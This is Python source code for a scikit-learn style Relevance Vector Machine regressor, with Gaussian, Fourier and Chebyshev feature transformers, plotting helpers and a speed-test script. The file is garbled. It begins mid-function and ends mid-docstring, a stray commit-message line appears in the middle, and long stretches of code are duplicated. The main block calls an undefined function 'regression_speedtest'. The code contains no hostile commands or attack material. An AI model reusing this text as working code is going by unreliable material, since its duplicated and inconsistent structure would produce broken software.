if iter_ != 0 and np.sum(np.abs(full_weight_vector(np.copy(w_new),active,inactive) - coef_old_)) < self.tol:
if verbose:
print("Convergence after ", str(iter_), " iterations")
break
elif iter_ == self.n_iter-1:
if verbose:
print("Iteration terminated after n_iter = {} step(s)".format(self.n_iter))
break
coef_old_ = full_weight_vector(np.copy(w_new),active,inactive)
# Compute S and Q (Faul and Tipping 2003 eqs. 24 & 25)
S0_tilde = beta_ * np.einsum("nm,nm->m", X, X) # in R^(n_features)
S1_tilde = - beta_**2 * np.einsum("mn,na->ma",X.T,np.dot(X_a,A_new)) # in R^(n_features x n_active)
S2_tilde = np.einsum("na,nm->am",X_a, X) # in R^(n_active x n_features)
S = S0_tilde + np.einsum("ma,am->m",S1_tilde,S2_tilde)
Q0_tilde = beta_ * np.einsum("nm,n->m", X, y) # in R^(n_features)
Q2_tilde = np.einsum("na,n->a",X_a, y) # in R^(n_active)
Q = Q0_tilde + np.einsum("ma,a->m",S1_tilde,Q2_tilde)
# Compute s and q (note the lower case)
s = np.copy(S)
q = np.copy(Q)
s[active] = alphas_[active]*S[active]/(alphas_[active]-S[active])
q[active] = alphas_[active]*Q[active]/(alphas_[active]-S[active])
# Recompute alphas using pruning
active = np.where(q**2>s)[0]
inactive = np.where(np.logical_not(q**2>s))[0]
alphas_[inactive] = np.inf
alphas_[active] = s[active]**2/(q[active]**2-s[active])
self.coef_ = w_new
self.active = active
self.inactive = inactive
self.sigma_ = A_new
self.beta_ = beta_
self._set_intercept(X_offset_[active], y_offset_, X_scale_[active])
return self
def predict(self, X, return_std=False):
"""Predict using the linear model.
In addition to the mean of the predictive distribution, also its
standard deviation can be returned.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
return_std : boolean, optional
Whether to return the standard deviation of posterior prediction.
Returns
-------
y_mean : array, shape = (n_samples,)
Mean of predictive distribution of query points.
y_std : array, shape = (n_samples,)
Standard deviation of predictive distribution of query points.
"""
X_a = X[:,self.active]
y_mean = self._decision_function(X_a)
if return_std is False:
return y_mean
else:
if self.normalize:
X_a = (X_a - self.X_offset_) / self.X_scale_
sigmas_squared_data = (X_a.dot(self.sigma_) * X_a).sum(axis=1)
y_std = np.sqrt(sigmas_squared_data + (1. / self.beta_))
return y_mean, y_std
def get_full_weights_vector(self):
return full_weight_vector(self.coef_,self.active,self.inactive)
def get_logbook(self):
assert self.do_logbook, "Logbook empty because do_logbook = {}.".format(self.do_logbook)
return self.logbook
def distribution_wrapper(dis,size=None,single=True):
"""Wraps scipy.stats distributions for RVM initialization.
Parameters
----------
size : int
How many samples to draw (if given, see 'single').
single : boolean
Whether or not a single float value is to be returned or an
array of values. If single == False then either 'size' samples
are drawn or otherwise if the design matrix is provided as an
argument of the wrapped function 'samples' then as M samples
are drawn (N, M = X.shape).
Example
-------
>>> init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
0.489243101252
>>> init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
[ 0.49100388 0.13933493 2.0644248 0.51169082 1.6274592 0.89930022]
"""
def samples(X=None):
if single:
return dis.rvs(size=1)[0]
else:
if isinstance(size,int):
return dis.rvs(size=size)
elif isinstance(X,np.ndarray):
return dis.rvs(size=X.shape[1])
else:
raise ValueError("size is not properly specified")
return samples
def repeated_regression(x,base_trafo,model_type,model_kwargs,t=None,tfun=None,
epsilon=None,Nruns=100,return_coefs=False,return_models=False,):
"""Repeats regressions.
This can be used to do multiple regressions on freshly regenerated
data (requires passing of a scipy.stats.rv_continuous object as epsilon,
and a callable tfun) or simply on the same data over an over.
Parameters
----------
x : np.ndarray
input / estimators
tfun : callable
t = tfun(x)
epsilon : scipy.stats distribution object
noise random variable
base_trafo : callable
for example the sklearn.preprocessing function such as PolynomialFeatures
to transform x into X
model : instance of regression class like RelevanceVectorMachine
Example
-------
>>> model_type = linear_model.RelevanceVectorMachine
>>> model_kwargs = dict(n_iter=250,verbose=False,compute_score=True,init_beta=init_beta,
init_alphas=init_alphas,fit_intercept=False)
>>> runtimes, coefs, models = repeated_regression(x,base_trafo,model_type,t=t,tfun=None,epsilon=None,
model_kwargs=model_kwargs,Nruns=Nruns,return_coefs=True,return_models=True)
"""
X = base_trafo(x.reshape((-1,1)))
assert not t is None or not (tfun is None and epsilon is None), "Either 't' has to be given or 'tfun' and 'epsilon'!"
if t is None:
t = tfun(x) + epsilon.rvs(size=x.shape[0])
runtimes = np.zeros(Nruns)
coefs, models = [], []
for i in range(Nruns):
t0 = time.time()
model = model_type(**model_kwargs)
model.fit(X,t)
runtimes[i] = time.time() - t0
if return_coefs:
coefs.append(model.get_full_weights_vector())
if return_models:
models.append(model)
if return_coefs and not return_models:
return runtimes, np.array(coefs)
elif return_coefs and return_models:
return runtimes, np.array(coefs), models
elif not return_coefs and return_models:
return runtimes, models
return runtimes
def print_run_stats(base_trafo,x,runtimes,coefs,Nruns,show_coefs=True):
print("\n================================================")
s = "X = {} & Nruns = {}:".format(base_trafo(x.reshape((-1,1))).shape,Nruns)
print(s)
print("-"*len(s))
print("\ntime: estimate = {:.4f}s, 2*std = {:.4f}s".format(runtimes.mean(),2*np.std(runtimes,ddof=1)))
if show_coefs:
print("\ncoefs (estimate +- 2*std):")
for i in range(coefs.shape[1]):
print(" {}: {:.4f} +- {:.4f}".format(i,coefs[:,i].mean(axis=0),2*np.std(coefs[:,i],axis=0,ddof=1)))
def plot_summary(models,noise,x,t,X,coefs,base_trafo):
ys = np.array([m.predict(X) for m in models])
y = ys.mean(axis=0)
yerr = 2*ys.std(axis=0,ddof=1)
fig = plt.figure(figsize=(5,7))
# summarizing all predictions
ax = fig.add_subplot(221)
ax.fill_between(x,y-yerr,y+yerr,label="95%",alpha=0.1,color="red")
ax.plot(x,t,'o',label="true",markerfacecolor="None",ms=2.,alpha=.75)
ax.plot(x,y,'-',label="estimate")
ax.set_xlabel("input")
ax.set_ylabel("output")
ax.set_title("y vs t")
plt.legend(loc=0)
coef_est = coefs.mean(axis=0)
coef_err = 2*coefs.std(ddof=1,axis=0)
# summarizing variation of weights
ax2 = fig.add_subplot(222)
ax2.errorbar(np.arange(coef_est.shape[0]),y=coef_est,yerr=coef_err,fmt="o",
markerfacecolor="None",label="RVM w",capsize=3.)
ax2.set_xlabel("weight index")
ax2.set_ylabel("weights")
ax2.set_title("Variation of weights")
plt.legend(loc=0)
# noise precision: model vs true noise
beta2scale = lambda beta: np.sqrt(2./beta)
noise2scale = lambda noise,axis: np.sqrt(2.)*np.std(noise,axis=axis,ddof=1)
betas = np.array([m.beta_ for m in models])
ax3 = fig.add_subplot(223)
ax3.hist(noise,label="true noise",normed=True,bins=100,range=(-5,5))
xlim = ax3.get_xlim()
_xp = np.linspace(xlim[0],xlim[1],100)
for model in models:
norm_rvm = stats.norm(loc=0,scale=beta2scale(model.beta_))
ax3.plot(_xp,norm_rvm.pdf(_xp),'-k',linewidth=.1)
ax3.set_xlabel("noise")
ax3.set_ylabel("frequency")
ax3.set_title("Noise precision:\nmodel vs true noise")
ax3.text(-5,.8,"true scale = {:.3f}".format(noise2scale(noise,0)))
ax3.text(-5,.3,"est. scale = {:.3f}+-{:.3f}".format(beta2scale(betas).mean(),2.*beta2scale(betas).std(ddof=1)))
# noise precision: error distribution vs true noise
ax4 = fig.add_subplot(224)
bins = 100
ax4.hist(noise,label="true noise",normed=True,bins=bins,range=(-5,5))
xlim = ax.get_xlim()
_xp = np.linspace(xlim[0],xlim[1],100)
_X = base_trafo(_xp.reshape((-1,1)))
pred_noise = []
for model in models:
n = model.predict(_X)-t
pred_noise.append(n)
ax4.hist(n,bins=bins,histtype="step",linewidth=.1,normed=True,range=xlim,color="k")
pred_noise = np.array(pred_noise)
ax4.set_xlabel("noise")
ax4.set_ylabel("frequency")
ax4.set_title("Noise precision:\nerr. dis. vs true noise")
ax4.text(-5,1.,"true scale = {:.3f}".format(noise2scale(noise,0)))
ax4.text(-5,.3,"pred scale = {:.3f}+-{:.3f}".format(noise2scale(pred_noise,1).mean(),noise2scale(pred_noise,1).std(ddof=1)*2))
plt.tight_layout()
plt.show()
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
for m in models:
ax.plot(m.mse_,'k-',alpha=.5,lw=.1)
ax.set_xlabel("iteration")
ax.set_ylabel("MSE")
ax.set_yscale("log")
ax.set_title("MSE curves of all regressions")
plt.tight_layout()
plt.show()
if __name__ == "__main__":
epsilon = stats.norm(loc=0,scale=0.01)
tfun = lambda x: np.sin(x) + np.cos(2.*x)
init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
Nruns = 100
N = 100
Ms = [3,5,10,20,50]
t_est, t_err = [], []
for M in Ms:
x = np.linspace(0,1,N)
k = M
trafo = FourierFeatures(k=k)
base_trafo = trafo.fit_transform
model_type = RelevanceVectorMachine
model_kwargs = dict(n_iter=250,verbose=False,compute_score=True,init_beta=init_beta,
init_alphas=init_alphas)
runtimes, coefs = regression_speedtest(x,base_trafo,model_type,t=None,tfun=tfun,epsilon=epsilon,
model_kwargs=model_kwargs,Nruns=Nruns,return_coefs=True)
print_run_stats(base_trafo,x,runtimes,coefs,Nruns)
linear_model: updated documentation
"""
scikit-learn style implementation of Relevance Vector Machine
based regression plus helper functions and example.
Eric Schmidt
e.schmidt@cantab.net
2017-10-20
"""
from __future__ import print_function
from sklearn import linear_model, utils, preprocessing
import sklearn
import numpy as np
from scipy import stats
import time
import matplotlib
import matplotlib.pylab as plt
matplotlib.rc('text', usetex=True)
matplotlib.rcParams['text.latex.preamble']=[r"\usepackage{amsmath}"]
def fun_wrapper(fun,k):
def _fun_wrapped(x):
return fun(x*k)
return _fun_wrapped
def dis_wrapper(dis):
def _dis_wrapped(x):
return dis.pdf(x)
return _dis_wrapped
def cheb_wrapper(i,k):
# i = the non-zero coefficient
# k = the number of coefficients (incl. the bias)
vec = np.zeros(k)
vec[i] = 1
def _cheb_wrapped(x):
return np.polynomial.chebyshev.chebval(x,vec)
return _cheb_wrapped
class GaussianFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Generate Gaussian features.
Generate a design matrix of k Gaussians starting at mu0, separated
by dmu all with the same scale.
Parameters
----------
k : int, optional, default 10
The number of Gaussian.
mu0 : float, optional, default 0
The starting point for placing the first Gaussian.
dmu : float, optional, default 1
The increment to use separating the Gaussians.
scale : float, optional, default 1
The scale of all Gaussians.
include_bias : boolean, optional, default True
The design matrix includes a bias column if True.
Example
--------
>>> x = np.linspace(-np.pi,np.pi,100)
>>> trafo = GaussianFeatures(k=30,mu0=-3,dmu=.2)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
"""
def __init__(self,k=10,mu0=0,dmu=1.,scale=1.,include_bias=True):
self.k = k
self.mu0 = mu0
self.dmu = dmu
self.scale = scale
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias=True, mu0=0., dmu=.5, scale=1.):
"""Generates a np.ndarray of Gaussian basis functions.
Parameters
----------
n_features : int
number of features for each observation
k : int
number of basis functions
include_bias : boolean, optional, default True
whether or not to include a bias function (function that returns 1)
mu0 : float, optional, default 0
position of the first Gaussian
dmu : float, optional, default .5
increment to shift the Gaussians by
scale : float, optional ,default 1
scale of all Gaussians
Returns
-------
basis : np.ndarray of callables of shape (k(+1),)
"""
bias = np.array([lambda x: np.ones(x.shape[0])])
G = np.array([dis_wrapper(stats.norm(loc=mu0+_k*dmu,scale=scale)) for _k in range(k)])
if include_bias:
basis = np.concatenate((bias,G))
else:
basis = G
return basis
def fit(self,X,y=None):
"""Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,
self.include_bias, self.mu0, self.dmu, self.scale))
return self
def transform(self,X):
"""Applies the basis functions.
Parameters
----------
X : np.ndarray of shape (n_samples, n_input_features)
Returns
-------
XP : np.ndarray of shape (n_samples, n_output_features)
The design matrix.
Note
----
Requires prior execution of self.fit.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_, self.k, self.include_bias,
self.mu0, self.dmu, self.scale)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
class FourierFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Creates the design matrix X from x using the Fourier basis set.
Parameters
----------
k : int, optional, default 10
number of basis functions for both sine and cosine, plus the possible bias
include_bias : boolean, optional, default True
whether or not to include a bias function (function that returns 1)
Example
-------
>>> x = np.linspace(-np.pi,np.pi,100)
>>> trafo = FourierFeatures(k=10)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
"""
def __init__(self,k=10,include_bias=True):
self.k = k
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias):
"""Generates a np.ndarray of sine and cosine basis functions.
Parameters
----------
n_features : int
number of features for each observation
k : int
number of basis functions for each sine and cosine
include_bias : boolean, optional, default True
whether or not to include a bias function (function that returns 1)
Returns
-------
basis : np.ndarray of callables of shape (2*k(+1),)
"""
bias = np.array([lambda x: np.ones(x.shape[0])])
sin = np.array([fun_wrapper(np.sin,_k) for _k in range(1,k)])
cos = np.array([fun_wrapper(np.cos,_k) for _k in range(1,k)])
if include_bias:
basis = np.concatenate((bias,sin,cos))
else:
basis = np.concatenate((sin,cos))
return basis
def fit(self,X,y=None):
"""
Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,self.include_bias))
return self
def transform(self,X):
"""Applies the basis functions.
Parameters
----------
X : np.ndarray of shape (n_samples, n_input_features)
Returns
-------
XP : np.ndarray of shape (n_samples, n_output_features)
The design matrix.
Note
----
Requires prior execution of self.fit.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_,self.k,self.include_bias)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
class ChebyshevFeatures(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):
"""Creates the design matrix X from x using Chebyshev polynomials.
Parameters
----------
k : int, optional, default 10
number of basis functions , plus the possible bias
include_bias : boolean, optional, default True
whether or not to include a bias function (function that returns 1)
Example
-------
>>> x = np.linspace(-np.pi,np.pi,100)
>>> trafo = ChebyshevFeatures(k=10)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
"""
def __init__(self,k=10,include_bias=True):
self.k = k
self.include_bias = include_bias
@staticmethod
def _basis_functions(n_features, k, include_bias):
"""Generates a np.ndarray of Chebyshev polynomials.
Parameters
----------
n_features : int
number of features for each observation
k : int
number of basis functionse
include_bias : boolean, optional, default True
whether or not to include a bias function (function that returns 1)
Returns
-------
basis : np.ndarray of callables of shape (k(+1),)
"""
bias = np.array([lambda x: np.ones(x.shape[0])])
T = np.array([cheb_wrapper(_k,k) for _k in range(1,k)])
if include_bias:
basis = np.concatenate((bias,T))
else:
basis = T
return basis
def fit(self,X,y=None):
"""
Compute number of output features.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data.
Returns
-------
self : instance
"""
n_samples, n_features = utils.check_array(X).shape
self.n_input_features_ = n_features
self.n_output_features_ = len(self._basis_functions(n_features,self.k,self.include_bias))
return self
def transform(self,X):
"""Applies the basis functions.
Parameters
----------
X : np.ndarray of shape (n_samples, n_input_features)
Returns
-------
XP : np.ndarray of shape (n_samples, n_output_features)
The design matrix.
Note
----
Requires prior execution of self.fit.
"""
sklearn.utils.validation.check_is_fitted(self, ['n_input_features_', 'n_output_features_'])
X = sklearn.utils.validation.check_array(X, dtype=sklearn.utils.validation.FLOAT_DTYPES)
n_samples, n_features = X.shape
if n_features != self.n_input_features_:
raise ValueError("X shape does not match training shape")
# allocate output data
XP = np.empty((n_samples, self.n_output_features_), dtype=X.dtype)
basis = self._basis_functions(self.n_input_features_,self.k,self.include_bias)
for i,b in enumerate(basis):
XP[:,i] = b(X).ravel()
return XP
def fit_transform(self,X):
"""Calls fit and transform on X.
"""
self.fit(X)
return self.transform(X)
def full_weight_vector(w, active, inactive):
"""Returns a zero-padded weights vector for RVM weights.
Parameters
----------
w : float np.ndarray of shape [n_active]
Weights vector obtained with an RVM containing only non-zero values.
active : int np.ndarray of shape [n_active]
Index vector indicating the positions of the 'w' values in the
full weights vector.
inactive : int np.ndarray of shape [n_features - n_active]
Index vector indicating the positions of 0s in the full weights
vector.
Returns
-------
w_full : float np.ndarray of shape [n_features]
Full weights vector.
"""
w_full = np.zeros(len(active)+len(inactive))
w_full[active] = w
return w_full
class RelevanceVectorMachine(linear_model.base.LinearModel,sklearn.base.RegressorMixin):
"""Relevance vector machine regression.
Fits the weights of a linear model. The weights of the model are assumed to
be normally distributed. RVMs also estimate the parameters alpha (precisions
of the distributions of the weights) and beta (precision of the distribution
of the noise) using type-II maximum likelihood or evidence maximization pruning
weights, thus leading to sparse weights vectors.
The algorithm is implemented as described by Faul and Tipping, 2003, AISTAT,
https://pdfs.semanticscholar.org/11f4/d997de8e35a1daf8b115439345d9994cfb69.pdf.
Parameters
----------
n_iter : int
maximum number of iterations
tol : float, optional, default 1.e-3
weights convergence tolerance threshold
compute_score : boolean, optional, default True
whether or not to compute mse and estimate and standard
deviation of the deviation
fit_itnercept : boolean, optional, default True
whether or not to fit the intercept
normalize : boolean, optional, default False
copy_X : boolean, optional, default True
verbose : boolean, optional, default False
init_beta : float or callable, optional, default None
if float needs to be bigger than 0
elif callable then the function needs to return a single value
init_alphas : np.ndarray list or tuple of float or callable, optional, default None
same as for init_beta but for an vector of values
do_logbook : boolean
wether or not to keep the logbook during regression:
logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
Attributes
----------
beta_ : float
noise precision
alphas_ : np.ndarray (n_features,) of float
weight precisions
active : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently active weights
inactive : np.ndarray (n_active,) of int
indices to places in the full weights vector to currently inactive weights
n_iter : int
maximum number of iterations
tol : float
weight covergence tolerance
compute_score : boolean
stores mse_, dev_est and dev_std if true
mse_ : list of float
mean square errors = (t-y)**2/n_samples
dev_est : list of float
estimate of deviation = (t-y)/n_samples
dev_std : list of float
one standard deviation of the deviatons = np.std(t-y,ddof=1)
sigma_ : np.ndarray (n_features,n_features) of float
contains the posterior covariance matrix of p(t|Xw,beta)*p(w|alphas)
do_logbook : boolean
logbook : dict of lists
Example
-------
>>> from linear_model import RelevanceVectorMachine
>>> from sklearn import preprocessing
>>> import numpy as np
>>> from scipy import stats
>>> x = np.linspace(-np.pi,np.pi,100)
>>> x_pred = np.linspace(-np.pi,np.pi,200)
>>> epsilon = stats.norm(loc=0,scale=0.01)
>>> t = np.exp(-x**2) + epsilon.rvs(size=x.shape[0])
>>> k = 5
>>> trafo = preprocessing.PolynomialFeatures(k)
>>> X = trafo.fit_transform(x.reshape((-1,1)))
>>> init_beta = 1./ np.var(t) # (that's the default start)
>>> init_alphas = np.ones(X.shape[1])
>>> init_alphas[1:] = np.inf
>>> model = RelevanceVectorMachine(n_iter=50,verbose=False,compute_score=True,init_beta=init_beta,
... init_alphas=init_alphas)
>>> model.fit(X,t)
RelevanceVectorMachine(compute_score=True, copy_X=True, fit_intercept=True,
init_alphas=array([ 1., inf, inf, inf, inf, inf]),
init_beta=8.2821399938358535, n_iter=50, normalize=False,
tol=0.001, verbose=False)
>>> y, yerr = model.predict(X,return_std=True)
Notes
-----
The notation here is adopted from Tipping 2001, Faul and Tipping 2003 and Bishop's "Pattern
Recognition and Machine Learning" book. No jumping in the sewer!
References
----------
Mike Tipping's favorite implementation: http://www.miketipping.com/downloads.htm
David MacKay's 1992, Bayesian Interpolation
http://www.utstat.toronto.edu/~rsalakhu/sta4273/notes/Lecture2.pdf
http://statweb.stanford.edu/~tibs/sta305files/Rudyregularization.pdf -> Ridge regression and SVD
http://www.statisticshowto.com/wp-content/uploads/2017/07/lecture-notes.pdf -> Ridge regression and SVD and Woodbury
"""
def __init__(self, n_iter=300, tol=1.e-3, compute_score=False,
fit_intercept=False, normalize=False, copy_X=True,
verbose=False,init_beta=None,init_alphas=None,do_logbook=False):
self.n_iter = n_iter
self.tol = tol
self.compute_score = compute_score
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.verbose = verbose
self.init_beta = init_beta
self.init_alphas = init_alphas
self.mse_ = []
self.dev_est = [] # deviation estimate
self.dev_std = [] # deviation standard deviation
self.do_logbook = do_logbook
self.logbook = {"L":[],"alphas":[],"beta":[],"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
@staticmethod
def _initialize_beta(y,init_beta=None,verbose=False):
beta_ = 1. / np.var(y) # default
if not init_beta is None:
if callable(init_beta):
if verbose: print("Setting beta_ = init_beta()")
beta_ = init_beta()
assert beta_ > 0., "init_beta() produced an invalid beta_ value = {}".format(beta_)
elif isinstance(init_beta,(int,float)):
if verbose: print("Setting beta_ = init_beta")
beta_ = np.copy(init_beta)
else:
raise ValueError("Do not understand self.init_beta = {}".format(init_beta))
else:
if verbose:
print("Setting default beta_ = 1/var(t)")
return beta_
@staticmethod
def _initialize_alphas(X,init_alphas=None,verbose=False):
n_samples, n_features = X.shape
alphas_ = np.ones(n_features) # default
alphas_[1:] = np.inf # setting all but one basis function as inactive (see Faul and Tipping 2003 p.4)
if not init_alphas is None:
if callable(init_alphas):
if verbose: print("Setting alphas_ = init_alphas()")
alphas_ = init_alphas(X)
assert (alphas_ > 0.).all(), "init_alphas() produced an invalid alphas_ array = {}".format(alphas_)
elif isinstance(init_alphas,(list,tuple,np.ndarray)):
if verbose: print("Setting alphas_ = init_alphas")
alphas_ = np.copy(init_alphas)
else:
raise ValueError("Do not understand self.init_alphas = {}".format(init_alphas))
else:
if verbose:
print("Setting default alphas_ = [1,inf,inf,...]")
return alphas_
def fit(self, X, y):
"""Fit the model
Parameters
----------
X : numpy array of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples]
Target values. Will be cast to X's dtype if necessary
Returns
-------
self : returns an instance of self.
"""
self.mse_ = []
self.dev_est = []
self.dev_std = []
X, y = utils.check_X_y(X, y, dtype=np.float64, y_numeric=True)
X, y, X_offset_, y_offset_, X_scale_ = self._preprocess_data(
X, y, self.fit_intercept, self.normalize, self.copy_X)
self.X_offset_ = X_offset_
self.X_scale_ = X_scale_
n_samples, n_features = X.shape
verbose = self.verbose
# Initialization of the hyperparameters
beta_ = self._initialize_beta(y,init_beta=self.init_beta,verbose=self.verbose)
alphas_ = self._initialize_alphas(X,init_alphas=self.init_alphas,verbose=self.verbose)
self.scores_ = list()
coef_old_ = None
XT_y = np.dot(X.T, y)
# Convergence loop of the RVM regression
for iter_ in range(self.n_iter):
# (in-)active basis functions
active = np.where(np.isfinite(alphas_))[0]
n_active = active.shape[0]
inactive = np.where(np.isinf(alphas_))[0]
# corresponding Sigma matrix (weights hyperprior covariance matrix)
Sigma = np.diag(alphas_)
Sigma_a = np.diag(alphas_[active]) # active part of Sigma -> numpy select?
X_a = X[:,active] # active part of the design matrix
# weights posterior mean (w_new) and covariance (A_new)
A_new = np.linalg.inv(beta_ * X_a.T.dot(X_a) + Sigma_a)
w_new = beta_ * A_new.dot(X_a.T.dot(y))
# mse
dt = y - np.dot(X_a, w_new)
mse_ = np.sum((dt) ** 2)
# Recompute beta
beta_ = (n_features - n_active + np.sum(alphas_[active]*np.diag(A_new)))
beta_ /= mse_
# Compute objective function: Gaussian for p(w|X,t,alphas,beta) \propto p(t|Xw,beta)p(w|alphas)
if self.compute_score:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.scores_.append(log_posterior)
self.mse_.append(float(mse_/n_samples))
self.dev_est.append(dt.mean())
self.dev_std.append(dt.std(ddof=1))
if self.do_logbook:
logbook = {"L":[],"alphas":[],"beta":[],
"weights":[],"weights_full":[],"mse":[],"tse":[],"min":[],"max":[],"Sigma":[],
"dev_est":[],"dev_std":[],"median_se":[]}
if self.compute_score:
self.logbook["L"].append(self.scores_[-1])
else:
log_prefactor = n_features*(beta_ - 2.*np.pi) - alphas_[active].sum() - 2.*np.pi
log_likelihood = -beta_ * mse_
log_prior = - w_new.T.dot(Sigma_a.dot(w_new))
log_posterior = .5 * (log_prefactor + log_likelihood + log_prior)
self.logbook["L"].append(log_posterior)
self.logbook["alphas"].append(alphas_)
self.logbook["beta"].append(beta_)
self.logbook["weights"].append(w_new)
self.logbook["weights_full"].append(full_weight_vector(w_new,active,inactive))
self.logbook["mse"].append(mse_/n_samples)
self.logbook["tse"].append(mse_)
self.logbook["min"].append(np.amin(dt))
self.logbook["max"].append(np.amax(dt))
self.logbook["dev_est"].append(dt.mean())
self.logbook["dev_std"].append(dt.std())
self.logbook["median_se"].append(np.median(dt))
# Check for convergence
if iter_ != 0 and np.sum(np.abs(full_weight_vector(np.copy(w_new),active,inactive) - coef_old_)) < self.tol:
if verbose:
print("Convergence after ", str(iter_), " iterations")
break
elif iter_ == self.n_iter-1:
if verbose:
print("Iteration terminated after n_iter = {} step(s)".format(self.n_iter))
break
coef_old_ = full_weight_vector(np.copy(w_new),active,inactive)
# Compute S and Q (Faul and Tipping 2003 eqs. 24 & 25)
S0_tilde = beta_ * np.einsum("nm,nm->m", X, X) # in R^(n_features)
S1_tilde = - beta_**2 * np.einsum("mn,na->ma",X.T,np.dot(X_a,A_new)) # in R^(n_features x n_active)
S2_tilde = np.einsum("na,nm->am",X_a, X) # in R^(n_active x n_features)
S = S0_tilde + np.einsum("ma,am->m",S1_tilde,S2_tilde)
Q0_tilde = beta_ * np.einsum("nm,n->m", X, y) # in R^(n_features)
Q2_tilde = np.einsum("na,n->a",X_a, y) # in R^(n_active)
Q = Q0_tilde + np.einsum("ma,a->m",S1_tilde,Q2_tilde)
# Compute s and q (note the lower case)
s = np.copy(S)
q = np.copy(Q)
s[active] = alphas_[active]*S[active]/(alphas_[active]-S[active])
q[active] = alphas_[active]*Q[active]/(alphas_[active]-S[active])
# Recompute alphas using pruning
active = np.where(q**2>s)[0]
inactive = np.where(np.logical_not(q**2>s))[0]
alphas_[inactive] = np.inf
alphas_[active] = s[active]**2/(q[active]**2-s[active])
self.coef_ = w_new
self.active = active
self.inactive = inactive
self.sigma_ = A_new
self.beta_ = beta_
self._set_intercept(X_offset_[active], y_offset_, X_scale_[active])
return self
def predict(self, X, return_std=False):
"""Predict using the linear model.
In addition to the mean of the predictive distribution, also its
standard deviation can be returned.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
return_std : boolean, optional
Whether to return the standard deviation of posterior prediction.
Returns
-------
y_mean : array, shape = (n_samples,)
Mean of predictive distribution of query points.
y_std : array, shape = (n_samples,)
Standard deviation of predictive distribution of query points.
"""
X_a = X[:,self.active]
y_mean = self._decision_function(X_a)
if return_std is False:
return y_mean
else:
if self.normalize:
X_a = (X_a - self.X_offset_) / self.X_scale_
sigmas_squared_data = (X_a.dot(self.sigma_) * X_a).sum(axis=1)
y_std = np.sqrt(sigmas_squared_data + (1. / self.beta_))
return y_mean, y_std
def get_full_weights_vector(self):
return full_weight_vector(self.coef_,self.active,self.inactive)
def get_logbook(self):
assert self.do_logbook, "Logbook empty because do_logbook = {}.".format(self.do_logbook)
return self.logbook
def distribution_wrapper(dis,size=None,single=True):
"""Wraps scipy.stats distributions for RVM initialization.
Parameters
----------
size : int
How many samples to draw (if given, see 'single').
single : boolean
Whether or not a single float value is to be returned or an
array of values. If single == False then either 'size' samples
are drawn or otherwise if the design matrix is provided as an
argument of the wrapped function 'samples' then as M samples
are drawn (N, M = X.shape).
Example
-------
>>> init_beta = distribution_wrapper(stats.halfnorm(scale=1),size=1,single=True)
0.489243101252
>>> init_alphas = distribution_wrapper(stats.halfnorm(scale=1),single=False)
[ 0.49100388 0.13933493 2.0644248 0.51169082 1.6274592 0.89930022]
"""
def samples(X=None):
if single:
return dis.rvs(size=1)[0]
else:
if isinstance(size,int):
return dis.rvs(size=size)
elif isinstance(X,np.ndarray):
return dis.rvs(size=X.shape[1])
else:
raise ValueError("size is not properly specified")
return samples
def repeated_regression(x,base_trafo,model_type,model_kwargs,t=None,tfun=None,
epsilon=None,Nruns=100,return_coefs=False,return_models=False,):
"""Repeats regressions.
This can be used to do multiple regressions on freshly regenerated
data (requires passing of a scipy.stats.rv_continuous object as epsilon,
and a callable tfun) or simply on the same data over an over.
Parameters
